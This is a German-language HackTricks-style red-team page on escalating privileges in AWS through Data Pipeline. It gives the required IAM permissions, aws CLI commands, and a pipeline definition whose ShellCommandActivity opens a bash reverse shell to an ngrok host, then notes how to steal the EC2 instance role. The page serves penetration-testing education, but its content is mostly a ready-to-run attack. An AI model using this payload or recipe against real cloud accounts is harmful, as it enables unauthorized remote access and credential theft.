AWS - Datapipeline Privesc

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

datapipeline

Für weitere Informationen zu Datapipeline siehe:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Benutzer mit diesen Berechtigungen können Privilegien eskalieren, indem sie eine Data Pipeline erstellen, um beliebige Befehle unter Verwendung der Berechtigungen der zugewiesenen Rolle auszuführen:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Nach der Erstellung des Daten-Pipelines aktualisiert der Angreifer dessen Definition, um spezifische Aktionen oder Ressourcenerstellungen anzugeben:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Beachten Sie, dass die Rolle in Zeile 14, 15 und 27 eine Rolle sein muss, die von datapipeline.amazonaws.com angenommen werden kann, und die Rolle in Zeile 28 eine Rolle sein muss, die von ec2.amazonaws.com mit einem EC2-Profilinstanz angenommen werden kann.

Darüber hinaus hat die EC2-Instanz nur Zugriff auf die Rolle, die von der EC2-Instanz angenommen werden kann (so dass Sie nur diese stehlen können).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` Die **Pipeline-Definition-Datei, die vom Angreifer erstellt wurde, enthält Anweisungen zum Ausführen von Befehlen** oder zum Erstellen von Ressourcen über die AWS API, wodurch die Berechtigungen der Data Pipeline-Rolle genutzt werden, um potenziell zusätzliche Privilegien zu erlangen.

Mögliche Auswirkungen: Direkter Privilege Escalation zum angegebenen ec2-Service-Rolle.

Referenzen

Erlernen Sie AWS-Hacking von Null auf Heldenniveau mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated